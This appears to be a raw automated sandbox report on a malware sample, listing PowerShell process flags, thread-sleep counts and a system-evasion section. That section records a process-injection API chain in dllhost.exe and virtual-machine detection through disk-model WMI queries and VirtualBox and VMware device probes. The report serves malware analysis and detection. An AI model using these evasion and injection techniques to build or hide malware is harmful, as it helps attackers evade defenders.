Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,37_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3632Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6097Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4682
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 752
Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 428Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 431Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1669
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2351Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 393Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3871Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2628Jump to behavior
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 387
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5192
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 636
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 3671
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8806
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 562
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 634
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8784
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 356
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 596
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 590
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 554
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 651
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 623
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 617
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 592
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 397
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 426
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 520
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 544
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 516
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 500
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 503
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 388
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 379
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_37-15454
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_33-245
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_37-17240
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_37-15463
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_37-15550
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 4.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 3632 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 6097 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 4682 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 752 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 5112Thread sleep time: -42800s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep count: 3871 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep count: 2628 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 1860Thread sleep count: 387 > 30
Source: C:\Windows\System32\dllhost.exe TID: 1860Thread sleep time: -38700s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1848Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2384Thread sleep count: 5192 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2384Thread sleep time: -5192000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2380Thread sleep count: 636 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2380Thread sleep time: -63600s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2384Thread sleep count: 3671 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2384Thread sleep time: -3671000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2044Thread sleep count: 8806 > 30
Source: C:\Windows\System32\lsass.exe TID: 2044Thread sleep time: -8806000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1988Thread sleep count: 562 > 30
Source: C:\Windows\System32\lsass.exe TID: 1988Thread sleep time: -56200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1532Thread sleep count: 81 > 30
Source: C:\Windows\System32\svchost.exe TID: 1532Thread sleep time: -81000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3920Thread sleep count: 634 > 30
Source: C:\Windows\System32\svchost.exe TID: 3920Thread sleep time: -63400s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 2060Thread sleep count: 8784 > 30
Source: C:\Windows\System32\dwm.exe TID: 2060Thread sleep time: -8784000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 2168Thread sleep count: 356 > 30
Source: C:\Windows\System32\dwm.exe TID: 2168Thread sleep time: -35600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4268Thread sleep count: 60 > 30
Source: C:\Windows\System32\svchost.exe TID: 4268Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3380Thread sleep count: 596 > 30
Source: C:\Windows\System32\svchost.exe TID: 3380Thread sleep time: -59600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2092Thread sleep count: 61 > 30
Source: C:\Windows\System32\svchost.exe TID: 2092Thread sleep time: -61000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2236Thread sleep count: 590 > 30
Source: C:\Windows\System32\svchost.exe TID: 2236Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6536Thread sleep count: 554 > 30
Source: C:\Windows\System32\svchost.exe TID: 6536Thread sleep time: -55400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2500Thread sleep count: 651 > 30
Source: C:\Windows\System32\svchost.exe TID: 2500Thread sleep time: -65100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2508Thread sleep count: 623 > 30
Source: C:\Windows\System32\svchost.exe TID: 2508Thread sleep time: -62300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2840Thread sleep count: 617 > 30
Source: C:\Windows\System32\svchost.exe TID: 2840Thread sleep time: -61700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2992Thread sleep count: 592 > 30
Source: C:\Windows\System32\svchost.exe TID: 2992Thread sleep time: -59200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5096Thread sleep count: 397 > 30
Source: C:\Windows\System32\svchost.exe TID: 5096Thread sleep time: -39700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7128Thread sleep count: 426 > 30
Source: C:\Windows\System32\svchost.exe TID: 7128Thread sleep time: -42600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep count: 520 > 30
Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep time: -52000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5812Thread sleep count: 544 > 30
Source: C:\Windows\System32\svchost.exe TID: 5812Thread sleep time: -54400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5404Thread sleep count: 516 > 30
Source: C:\Windows\System32\svchost.exe TID: 5404Thread sleep time: -51600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6844Thread sleep count: 500 > 30
Source: C:\Windows\System32\svchost.exe TID: 6844Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5580Thread sleep count: 503 > 30
Source: C:\Windows\System32\svchost.exe TID: 5580Thread sleep time: -50300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3896Thread sleep count: 388 > 30
Source: C:\Windows\System32\svchost.exe TID: 3896Thread sleep time: -38800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6468Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 6468Thread sleep time: -37900s >= -30000s
